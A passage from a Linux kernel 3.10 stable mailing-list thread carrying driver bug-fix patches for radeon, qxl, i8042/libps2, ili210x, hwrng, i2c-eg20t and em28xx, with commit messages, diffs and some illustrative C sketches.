--- a/drivers/gpu/drm/radeon/radeon_legacy_crtc.c
+++ b/drivers/gpu/drm/radeon/radeon_legacy_crtc.c
@@ -331,6 +331,8 @@ static void radeon_crtc_dpms(struct drm_crtc *crtc, int mode)
 			WREG32_P(RADEON_CRTC_EXT_CNTL, crtc_ext_cntl, ~(mask | crtc_ext_cntl));
 		}
 		drm_vblank_post_modeset(dev, radeon_crtc->crtc_id);
+		/* Make sure vblank interrupt is still enabled if needed */
+		radeon_irq_set(rdev);
 		radeon_crtc_load_lut(crtc);
 		break;
 	case DRM_MODE_DPMS_STANDBY:
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 182/319] qxl: check for kmap failures
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (80 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 181/319] drm/radeon: Ensure vblank interrupt is enabled on DPMS transition to on Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 183/319] Input: i8042 - break load dependency between atkbd/psmouse and i8042 Willy Tarreau
                   ` (136 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Dan Carpenter, Daniel Vetter, Willy Tarreau

From: Dan Carpenter <dan.carpenter@oracle.com>

commit f4cceb2affcd1285d4ce498089e8a79f4cd2fa66 upstream.

If kmap fails, it leads to memory corruption.

Fixes: f64122c1f6ad ('drm: add new QXL driver. (v1.4)')
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Signed-off-by: Daniel Vetter <daniel.vetter@ffwll.ch>
Link: http://patchwork.freedesktop.org/patch/msgid/20160711084633.GA31411@mwanda
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/gpu/drm/qxl/qxl_draw.c | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/drivers/gpu/drm/qxl/qxl_draw.c b/drivers/gpu/drm/qxl/qxl_draw.c
index 3c8c3db..ff32052 100644
--- a/drivers/gpu/drm/qxl/qxl_draw.c
+++ b/drivers/gpu/drm/qxl/qxl_draw.c
@@ -114,6 +114,8 @@ static int qxl_palette_create_1bit(struct qxl_bo **palette_bo,
 				    palette_bo);
 
 	ret = qxl_bo_kmap(*palette_bo, (void **)&pal);
+	if (ret)
+		return ret;
 	pal->num_ents = 2;
 	pal->unique = unique++;
 	if (visual == FB_VISUAL_TRUECOLOR || visual == FB_VISUAL_DIRECTCOLOR) {
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 183/319] Input: i8042 - break load dependency between atkbd/psmouse and i8042
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (81 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 182/319] qxl: check for kmap failures Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 184/319] Input: i8042 - set up shared ps2_cmd_mutex for AUX ports Willy Tarreau
                   ` (135 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Dmitry Torokhov, Willy Tarreau

From: Dmitry Torokhov <dmitry.torokhov@gmail.com>

commit 4097461897df91041382ff6fcd2bfa7ee6b2448c upstream.

As explained in 1407814240-4275-1-git-send-email-decui@microsoft.com we
have a hard load dependency between i8042 and atkbd which prevents
keyboard from working on Gen2 Hyper-V VMs.

> hyperv_keyboard invokes serio_interrupt(), which needs a valid serio
> driver like atkbd.c.  atkbd.c depends on libps2.c because it invokes
> ps2_command().  libps2.c depends on i8042.c because it invokes
> i8042_check_port_owner().  As a result, hyperv_keyboard actually
> depends on i8042.c.
>
> For a Generation 2 Hyper-V VM (meaning no i8042 device emulated), if a
> Linux VM (like Arch Linux) happens to configure CONFIG_SERIO_I8042=m
> rather than =y, atkbd.ko can't load because i8042.ko can't load(due to
> no i8042 device emulated) and finally hyperv_keyboard can't work and
> the user can't input: https://bugs.archlinux.org/task/39820
> (Ubuntu/RHEL/SUSE aren't affected since they use CONFIG_SERIO_I8042=y)

To break the dependency we move away from using i8042_check_port_owner()
and instead allow the serio port owner to specify a mutex that clients
should use to serialize the PS/2 command stream.
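
The lock selection can be pictured with the following userspace sketch,
which uses pthread mutexes in place of kernel mutexes. The struct and
function names (port, ps2dev_sketch, pick_mutex, same_lock) are hypothetical
and chosen only for this example; the real change is in the libps2.c hunk
below.

```c
#include <assert.h>
#include <pthread.h>
#include <stddef.h>

struct port {
	/* Set by the port owner when several ports share hardware, else NULL. */
	pthread_mutex_t *shared_cmd_mutex;
};

struct ps2dev_sketch {
	struct port *port;
	pthread_mutex_t cmd_mutex;	/* per-device fallback lock */
};

/* One lock shared by every port of the (imaginary) controller. */
static pthread_mutex_t controller_mutex = PTHREAD_MUTEX_INITIALIZER;

/* Prefer the owner-supplied mutex, fall back to the device's own. */
static pthread_mutex_t *pick_mutex(struct ps2dev_sketch *dev)
{
	return dev->port->shared_cmd_mutex ? dev->port->shared_cmd_mutex
					   : &dev->cmd_mutex;
}

static void begin_command(struct ps2dev_sketch *dev)
{
	pthread_mutex_lock(pick_mutex(dev));
}

static void end_command(struct ps2dev_sketch *dev)
{
	pthread_mutex_unlock(pick_mutex(dev));
}

/* Returns 1 when two devices on ports set up with 'shared' use one lock. */
static int same_lock(pthread_mutex_t *shared)
{
	struct port kbd = { .shared_cmd_mutex = shared };
	struct port aux = { .shared_cmd_mutex = shared };
	struct ps2dev_sketch a = { .port = &kbd,
				   .cmd_mutex = PTHREAD_MUTEX_INITIALIZER };
	struct ps2dev_sketch b = { .port = &aux,
				   .cmd_mutex = PTHREAD_MUTEX_INITIALIZER };

	begin_command(&a);
	end_command(&a);
	return pick_mutex(&a) == pick_mutex(&b);
}
```

With a shared mutex both devices serialize on the same lock; with NULL each
device falls back to its private lock, so a driver that never touches the
controller no longer needs any symbol from it.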

Reported-by: Mark Laws <mdl@60hz.org>
Tested-by: Mark Laws <mdl@60hz.org>
Signed-off-by: Dmitry Torokhov <dmitry.torokhov@gmail.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/input/serio/i8042.c  | 16 +---------------
 drivers/input/serio/libps2.c | 10 ++++------
 include/linux/i8042.h        |  6 ------
 include/linux/serio.h        | 24 +++++++++++++++++++-----
 4 files changed, 24 insertions(+), 32 deletions(-)

diff --git a/drivers/input/serio/i8042.c b/drivers/input/serio/i8042.c
index 9870c54..2513c8a 100644
--- a/drivers/input/serio/i8042.c
+++ b/drivers/input/serio/i8042.c
@@ -1223,6 +1223,7 @@ static int __init i8042_create_kbd_port(void)
 	serio->start		= i8042_start;
 	serio->stop		= i8042_stop;
 	serio->close		= i8042_port_close;
+	serio->ps2_cmd_mutex	= &i8042_mutex;
 	serio->port_data	= port;
 	serio->dev.parent	= &i8042_platform_device->dev;
 	strlcpy(serio->name, "i8042 KBD port", sizeof(serio->name));
@@ -1310,21 +1311,6 @@ static void i8042_unregister_ports(void)
 	}
 }
 
-/*
- * Checks whether port belongs to i8042 controller.
- */
-bool i8042_check_port_owner(const struct serio *port)
-{
-	int i;
-
-	for (i = 0; i < I8042_NUM_PORTS; i++)
-		if (i8042_ports[i].serio == port)
-			return true;
-
-	return false;
-}
-EXPORT_SYMBOL(i8042_check_port_owner);
-
 static void i8042_free_irqs(void)
 {
 	if (i8042_aux_irq_registered)
diff --git a/drivers/input/serio/libps2.c b/drivers/input/serio/libps2.c
index 07a8363..b5ec313 100644
--- a/drivers/input/serio/libps2.c
+++ b/drivers/input/serio/libps2.c
@@ -57,19 +57,17 @@ EXPORT_SYMBOL(ps2_sendbyte);
 
 void ps2_begin_command(struct ps2dev *ps2dev)
 {
-	mutex_lock(&ps2dev->cmd_mutex);
+	struct mutex *m = ps2dev->serio->ps2_cmd_mutex ?: &ps2dev->cmd_mutex;
 
-	if (i8042_check_port_owner(ps2dev->serio))
-		i8042_lock_chip();
+	mutex_lock(m);
 }
 EXPORT_SYMBOL(ps2_begin_command);
 
 void ps2_end_command(struct ps2dev *ps2dev)
 {
-	if (i8042_check_port_owner(ps2dev->serio))
-		i8042_unlock_chip();
+	struct mutex *m = ps2dev->serio->ps2_cmd_mutex ?: &ps2dev->cmd_mutex;
 
-	mutex_unlock(&ps2dev->cmd_mutex);
+	mutex_unlock(m);
 }
 EXPORT_SYMBOL(ps2_end_command);
 
diff --git a/include/linux/i8042.h b/include/linux/i8042.h
index a986ff5..801c307 100644
--- a/include/linux/i8042.h
+++ b/include/linux/i8042.h
@@ -38,7 +38,6 @@ struct serio;
 void i8042_lock_chip(void);
 void i8042_unlock_chip(void);
 int i8042_command(unsigned char *param, int command);
-bool i8042_check_port_owner(const struct serio *);
 int i8042_install_filter(bool (*filter)(unsigned char data, unsigned char str,
 					struct serio *serio));
 int i8042_remove_filter(bool (*filter)(unsigned char data, unsigned char str,
@@ -59,11 +58,6 @@ static inline int i8042_command(unsigned char *param, int command)
 	return -ENODEV;
 }
 
-static inline bool i8042_check_port_owner(const struct serio *serio)
-{
-	return false;
-}
-
 static inline int i8042_install_filter(bool (*filter)(unsigned char data, unsigned char str,
 					struct serio *serio))
 {
diff --git a/include/linux/serio.h b/include/linux/serio.h
index 36aac73..deffa474 100644
--- a/include/linux/serio.h
+++ b/include/linux/serio.h
@@ -28,7 +28,8 @@ struct serio {
 
 	struct serio_device_id id;
 
-	spinlock_t lock;		/* protects critical sections from port's interrupt handler */
+	/* Protects critical sections from port's interrupt handler */
+	spinlock_t lock;
 
 	int (*write)(struct serio *, unsigned char);
 	int (*open)(struct serio *);
@@ -37,16 +38,29 @@ struct serio {
 	void (*stop)(struct serio *);
 
 	struct serio *parent;
-	struct list_head child_node;	/* Entry in parent->children list */
+	/* Entry in parent->children list */
+	struct list_head child_node;
 	struct list_head children;
-	unsigned int depth;		/* level of nesting in serio hierarchy */
+	/* Level of nesting in serio hierarchy */
+	unsigned int depth;
 
-	struct serio_driver *drv;	/* accessed from interrupt, must be protected by serio->lock and serio->sem */
-	struct mutex drv_mutex;		/* protects serio->drv so attributes can pin driver */
+	/*
+	 * serio->drv is accessed from interrupt handlers; when modifying
+	 * caller should acquire serio->drv_mutex and serio->lock.
+	 */
+	struct serio_driver *drv;
+	/* Protects serio->drv so attributes can pin current driver */
+	struct mutex drv_mutex;
 
 	struct device dev;
 
 	struct list_head node;
+
+	/*
+	 * For use by PS/2 layer when several ports share hardware and
+	 * may get indigestion when exposed to concurrent access (i8042).
+	 */
+	struct mutex *ps2_cmd_mutex;
 };
 #define to_serio_port(d)	container_of(d, struct serio, dev)
 
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 184/319] Input: i8042 - set up shared ps2_cmd_mutex for AUX ports
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (82 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 183/319] Input: i8042 - break load dependency between atkbd/psmouse and i8042 Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 185/319] Input: ili210x - fix permissions on "calibrate" attribute Willy Tarreau
                   ` (134 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Dmitry Torokhov, Willy Tarreau

From: Dmitry Torokhov <dmitry.torokhov@gmail.com>

commit 47af45d684b5f3ae000ad448db02ce4f13f73273 upstream.

Commit 4097461897df ("Input: i8042 - break load dependency ...")
correctly set up the ps2_cmd_mutex pointer for the KBD port but forgot to
do the same for the AUX port(s), which causes communication on the KBD
and AUX ports to clash.

Fixes: 4097461897df ("Input: i8042 - break load dependency ...")
Reported-by: Bruno Wolff III <bruno@wolff.to>
Tested-by: Bruno Wolff III <bruno@wolff.to>
Signed-off-by: Dmitry Torokhov <dmitry.torokhov@gmail.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/input/serio/i8042.c | 1 +
 1 file changed, 1 insertion(+)

diff --git a/drivers/input/serio/i8042.c b/drivers/input/serio/i8042.c
index 2513c8a..2d8f959 100644
--- a/drivers/input/serio/i8042.c
+++ b/drivers/input/serio/i8042.c
@@ -1249,6 +1249,7 @@ static int __init i8042_create_aux_port(int idx)
 	serio->write		= i8042_aux_write;
 	serio->start		= i8042_start;
 	serio->stop		= i8042_stop;
+	serio->ps2_cmd_mutex	= &i8042_mutex;
 	serio->port_data	= port;
 	serio->dev.parent	= &i8042_platform_device->dev;
 	if (idx < 0) {
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 185/319] Input: ili210x - fix permissions on "calibrate" attribute
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (83 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 184/319] Input: i8042 - set up shared ps2_cmd_mutex for AUX ports Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 186/319] hwrng: exynos - Disable runtime PM on probe failure Willy Tarreau
                   ` (133 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Dmitry Torokhov, Willy Tarreau

From: Dmitry Torokhov <dmitry.torokhov@gmail.com>

commit b27c0d0c3bf3073e8ae19875eb1d3755c5e8c072 upstream.

The "calibrate" attribute does not provide a "show" method, so we should
not mark it as readable.

Signed-off-by: Dmitry Torokhov <dmitry.torokhov@gmail.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/input/touchscreen/ili210x.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/input/touchscreen/ili210x.c b/drivers/input/touchscreen/ili210x.c
index 1418bdd..ceaa790 100644
--- a/drivers/input/touchscreen/ili210x.c
+++ b/drivers/input/touchscreen/ili210x.c
@@ -169,7 +169,7 @@ static ssize_t ili210x_calibrate(struct device *dev,
 
 	return count;
 }
-static DEVICE_ATTR(calibrate, 0644, NULL, ili210x_calibrate);
+static DEVICE_ATTR(calibrate, S_IWUSR, NULL, ili210x_calibrate);
 
 static struct attribute *ili210x_attributes[] = {
 	&dev_attr_calibrate.attr,
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 186/319] hwrng: exynos - Disable runtime PM on probe failure
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (84 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 185/319] Input: ili210x - fix permissions on "calibrate" attribute Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 187/319] hwrng: omap - Fix assumption that runtime_get_sync will always succeed Willy Tarreau
                   ` (132 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Krzysztof Kozlowski, Herbert Xu, Willy Tarreau

From: Krzysztof Kozlowski <k.kozlowski@samsung.com>

commit 48a61e1e2af8020f11a2b8f8dc878144477623c6 upstream.

Add a proper error path (disabling runtime PM) for the case where hwrng
registration fails.

Fixes: b329669ea0b5 ("hwrng: exynos - Add support for Exynos random number generator")
Signed-off-by: Krzysztof Kozlowski <k.kozlowski@samsung.com>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/char/hw_random/exynos-rng.c | 9 ++++++++-
 1 file changed, 8 insertions(+), 1 deletion(-)

diff --git a/drivers/char/hw_random/exynos-rng.c b/drivers/char/hw_random/exynos-rng.c
index 402ccfb..b6ec73f 100644
--- a/drivers/char/hw_random/exynos-rng.c
+++ b/drivers/char/hw_random/exynos-rng.c
@@ -105,6 +105,7 @@ static int exynos_rng_probe(struct platform_device *pdev)
 {
 	struct exynos_rng *exynos_rng;
 	struct resource *res;
+	int ret;
 
 	exynos_rng = devm_kzalloc(&pdev->dev, sizeof(struct exynos_rng),
 					GFP_KERNEL);
@@ -132,7 +133,13 @@ static int exynos_rng_probe(struct platform_device *pdev)
 	pm_runtime_use_autosuspend(&pdev->dev);
 	pm_runtime_enable(&pdev->dev);
 
-	return hwrng_register(&exynos_rng->rng);
+	ret = hwrng_register(&exynos_rng->rng);
+	if (ret) {
+		pm_runtime_dont_use_autosuspend(&pdev->dev);
+		pm_runtime_disable(&pdev->dev);
+	}
+
+	return ret;
 }
 
 static int exynos_rng_remove(struct platform_device *pdev)
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 187/319] hwrng: omap - Fix assumption that runtime_get_sync will always succeed
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (85 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 186/319] hwrng: exynos - Disable runtime PM on probe failure Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 188/319] hwrng: omap - Only fail if pm_runtime_get_sync returns < 0 Willy Tarreau
                   ` (131 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Nishanth Menon, Paul Walmsley, Herbert Xu, Willy Tarreau

From: Nishanth Menon <nm@ti.com>

commit 61dc0a446e5d08f2de8a24b45f69a1e302bb1b1b upstream.

pm_runtime_get_sync does return an error value that must be checked for
error conditions; otherwise, for various reasons, the device may not be
enabled and the system will crash due to lack of clock to the hardware
module.

Before:
[   12.562784] [00000000] *pgd=fe193835
[   12.562792] Internal error: : 1406 [#1] SMP ARM
[...]
[   12.562864] CPU: 1 PID: 241 Comm: modprobe Not tainted 4.7.0-rc4-next-20160624 #2
[   12.562867] Hardware name: Generic DRA74X (Flattened Device Tree)
[   12.562872] task: ed51f140 ti: ed44c000 task.ti: ed44c000
[   12.562886] PC is at omap4_rng_init+0x20/0x84 [omap_rng]
[   12.562899] LR is at set_current_rng+0xc0/0x154 [rng_core]
[...]

After the proper checks:
[   94.366705] omap_rng 48090000.rng: _od_fail_runtime_resume: FIXME:
missing hwmod/omap_dev info
[   94.375767] omap_rng 48090000.rng: Failed to runtime_get device -19
[   94.382351] omap_rng 48090000.rng: initialization failed.

Fixes: 665d92fa85b5 ("hwrng: OMAP: convert to use runtime PM")
Cc: Paul Walmsley <paul@pwsan.com>
Signed-off-by: Nishanth Menon <nm@ti.com>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
[wt: adjusted context for pre-3.12-rc1 kernels]

Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/char/hw_random/omap-rng.c | 16 ++++++++++++++--
 1 file changed, 14 insertions(+), 2 deletions(-)

diff --git a/drivers/char/hw_random/omap-rng.c b/drivers/char/hw_random/omap-rng.c
index d2903e7..52aebbe 100644
--- a/drivers/char/hw_random/omap-rng.c
+++ b/drivers/char/hw_random/omap-rng.c
@@ -127,7 +127,12 @@ static int omap_rng_probe(struct platform_device *pdev)
 	dev_set_drvdata(&pdev->dev, priv);
 
 	pm_runtime_enable(&pdev->dev);
-	pm_runtime_get_sync(&pdev->dev);
+	ret = pm_runtime_get_sync(&pdev->dev);
+	if (ret) {
+		dev_err(&pdev->dev, "Failed to runtime_get device: %d\n", ret);
+		pm_runtime_put_noidle(&pdev->dev);
+		goto err_ioremap;
+	}
 
 	ret = hwrng_register(&omap_rng_ops);
 	if (ret)
@@ -182,8 +187,15 @@ static int omap_rng_suspend(struct device *dev)
 static int omap_rng_resume(struct device *dev)
 {
 	struct omap_rng_private_data *priv = dev_get_drvdata(dev);
+	int ret;
+
+	ret = pm_runtime_get_sync(dev);
+	if (ret) {
+		dev_err(dev, "Failed to runtime_get device: %d\n", ret);
+		pm_runtime_put_noidle(dev);
+		return ret;
+	}
 
-	pm_runtime_get_sync(dev);
 	omap_rng_write_reg(priv, RNG_MASK_REG, 0x1);
 
 	return 0;
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 188/319] hwrng: omap - Only fail if pm_runtime_get_sync returns < 0
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (86 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 187/319] hwrng: omap - Fix assumption that runtime_get_sync will always succeed Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 189/319] i2c-eg20t: fix race between i2c init and interrupt enable Willy Tarreau
                   ` (130 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Dave Gerlach, Herbert Xu, Willy Tarreau

From: Dave Gerlach <d-gerlach@ti.com>

commit ad8529fde9e3601180a839867a8ab041109aebb5 upstream.

Currently omap-rng checks the return value of pm_runtime_get_sync and
reports failure if anything non-zero is returned. However, it should be
checking for ret < 0, as pm_runtime_get_sync returns 0 on success but can
also return 1 if the device was already active, which is not a failure
case. Only values < 0 are actual failures.
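
As a minimal userspace sketch of the return convention described above
(the helper names are hypothetical and are not part of the driver), the
two checks differ only for the "already active" value of 1:

```c
#include <assert.h>
#include <errno.h>
#include <stdbool.h>

/*
 * Hypothetical stand-ins for the two checks. The convention assumed here
 * is the one stated in the commit message: negative on failure, 0 on
 * success, 1 if the device was already active.
 */
static bool get_sync_failed_old(int ret)
{
	return ret != 0;	/* treats "already active" as an error */
}

static bool get_sync_failed_new(int ret)
{
	return ret < 0;		/* only negative values are failures */
}

/* Exercises both checks against the three classes of return value. */
static void check_return_convention(void)
{
	assert(!get_sync_failed_old(0) && !get_sync_failed_new(0));
	assert(get_sync_failed_old(1) && !get_sync_failed_new(1));
	assert(get_sync_failed_old(-EINVAL) && get_sync_failed_new(-EINVAL));
}
```

Calling check_return_convention() from a main() runs the comparison.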

Fixes: 61dc0a446e5d ("hwrng: omap - Fix assumption that runtime_get_sync will always succeed")
Signed-off-by: Dave Gerlach <d-gerlach@ti.com>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/char/hw_random/omap-rng.c | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/drivers/char/hw_random/omap-rng.c b/drivers/char/hw_random/omap-rng.c
index 52aebbe..2798fb1 100644
--- a/drivers/char/hw_random/omap-rng.c
+++ b/drivers/char/hw_random/omap-rng.c
@@ -128,7 +128,7 @@ static int omap_rng_probe(struct platform_device *pdev)
 
 	pm_runtime_enable(&pdev->dev);
 	ret = pm_runtime_get_sync(&pdev->dev);
-	if (ret) {
+	if (ret < 0) {
 		dev_err(&pdev->dev, "Failed to runtime_get device: %d\n", ret);
 		pm_runtime_put_noidle(&pdev->dev);
 		goto err_ioremap;
@@ -190,7 +190,7 @@ static int omap_rng_resume(struct device *dev)
 	int ret;
 
 	ret = pm_runtime_get_sync(dev);
-	if (ret) {
+	if (ret < 0) {
 		dev_err(dev, "Failed to runtime_get device: %d\n", ret);
 		pm_runtime_put_noidle(dev);
 		return ret;
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 189/319] i2c-eg20t: fix race between i2c init and interrupt enable
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (87 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 188/319] hwrng: omap - Only fail if pm_runtime_get_sync returns < 0 Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 190/319] em28xx-i2c: rt_mutex_trylock() returns zero on failure Willy Tarreau
                   ` (129 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Yadi.hu, Wolfram Sang, Willy Tarreau

From: "Yadi.hu" <yadi.hu@windriver.com>

commit 371a015344b6e270e7e3632107d9554ec6d27a6b upstream.

The eg20t driver calls request_irq() before pch_base_address, the
base address of the i2c controller's registers, is assigned a valid value.

One possible scenario is that, when the i2c controller shares an interrupt
number with other devices, an interrupt that does not originate from the
eg20t arrives immediately after request_irq() is executed. Since the
interrupt handler pch_i2c_handler() is already active as a shared action,
it will be called and will read its own registers to determine whether
the interrupt is from itself.

At that moment, since the base address of the i2c registers has not yet
been remapped into kernel space, the interrupt handler will access an
illegal address and an error occurs.
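
The ordering problem can be sketched in userspace as follows. This is
only a model under stated assumptions: model_request_irq(),
model_handler() and the structures are hypothetical stand-ins, and the
handler returns -1 where the real one would access an unmapped address.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

struct model_chan { volatile uint32_t *base; };	/* NULL until assigned */
struct model_adapter { struct model_chan ch[2]; int ch_num; };

typedef int (*model_irq_handler_t)(void *dev_id);
static model_irq_handler_t registered_handler;
static void *registered_dev;

/* Stand-in for request_irq(): from here on the handler may be called. */
static int model_request_irq(model_irq_handler_t h, void *dev_id)
{
	registered_handler = h;
	registered_dev = dev_id;
	return 0;
}

/* Shared handler: reads each channel's first register to see who fired. */
static int model_handler(void *dev_id)
{
	struct model_adapter *a = dev_id;
	int handled = 0;

	for (int i = 0; i < a->ch_num; i++) {
		if (a->ch[i].base == NULL)
			return -1;	/* the real handler would fault here */
		if (a->ch[i].base[0] != 0)
			handled = 1;
	}
	return handled;
}

/* Fixed ordering: assign every base address, then register the handler. */
static int model_probe(struct model_adapter *a, uint32_t *regs)
{
	a->ch_num = 2;
	for (int i = 0; i < a->ch_num; i++)
		a->ch[i].base = regs + 0x40 * i;	/* 0x100 bytes apart */
	return model_request_irq(model_handler, a);
}
```

With the base addresses assigned first, a foreign interrupt on the shared
line makes the handler report "not mine" instead of touching a NULL base.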

Signed-off-by: Yadi.hu <yadi.hu@windriver.com>
Signed-off-by: Wolfram Sang <wsa@the-dreams.de>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/i2c/busses/i2c-eg20t.c | 18 +++++++++++-------
 1 file changed, 11 insertions(+), 7 deletions(-)

diff --git a/drivers/i2c/busses/i2c-eg20t.c b/drivers/i2c/busses/i2c-eg20t.c
index 0f37529..773a6f5 100644
--- a/drivers/i2c/busses/i2c-eg20t.c
+++ b/drivers/i2c/busses/i2c-eg20t.c
@@ -798,13 +798,6 @@ static int pch_i2c_probe(struct pci_dev *pdev,
 	/* Set the number of I2C channel instance */
 	adap_info->ch_num = id->driver_data;
 
-	ret = request_irq(pdev->irq, pch_i2c_handler, IRQF_SHARED,
-		  KBUILD_MODNAME, adap_info);
-	if (ret) {
-		pch_pci_err(pdev, "request_irq FAILED\n");
-		goto err_request_irq;
-	}
-
 	for (i = 0; i < adap_info->ch_num; i++) {
 		pch_adap = &adap_info->pch_data[i].pch_adapter;
 		adap_info->pch_i2c_suspended = false;
@@ -821,6 +814,17 @@ static int pch_i2c_probe(struct pci_dev *pdev,
 		adap_info->pch_data[i].pch_base_address = base_addr + 0x100 * i;
 
 		pch_adap->dev.parent = &pdev->dev;
+	}
+
+	ret = request_irq(pdev->irq, pch_i2c_handler, IRQF_SHARED,
+		  KBUILD_MODNAME, adap_info);
+	if (ret) {
+		pch_pci_err(pdev, "request_irq FAILED\n");
+		goto err_request_irq;
+	}
+
+	for (i = 0; i < adap_info->ch_num; i++) {
+		pch_adap = &adap_info->pch_data[i].pch_adapter;
 
 		pch_i2c_init(&adap_info->pch_data[i]);
 
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 190/319] em28xx-i2c: rt_mutex_trylock() returns zero on failure
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (88 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 189/319] i2c-eg20t: fix race between i2c init and interrupt enable Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 191/319] i2c: core: fix NULL pointer dereference under race condition Willy Tarreau
                   ` (128 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Dan Carpenter, Mauro Carvalho Chehab, Willy Tarreau

From: Dan Carpenter <dan.carpenter@oracle.com>

commit e44c153b30c9a0580fc2b5a93f3c6d593def2278 upstream.

The code is checking for negative returns but it should be checking for
zero.
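
A minimal sketch of why the sign check never fires, assuming a trylock
that returns 1 when the lock is taken and 0 when it is not (the subject
line states the zero-on-failure part; model_trylock() and the xfer
helpers are hypothetical):

```c
#include <assert.h>
#include <errno.h>
#include <stdbool.h>

struct model_lock { bool held; };

/* Assumed convention: 1 if acquired, 0 if contended, never negative. */
static int model_trylock(struct model_lock *l)
{
	if (l->held)
		return 0;
	l->held = true;
	return 1;
}

/* Old check: "rc < 0" is never true, so contention goes unnoticed. */
static int xfer_old(struct model_lock *l)
{
	int rc = model_trylock(l);

	if (rc < 0)
		return rc;
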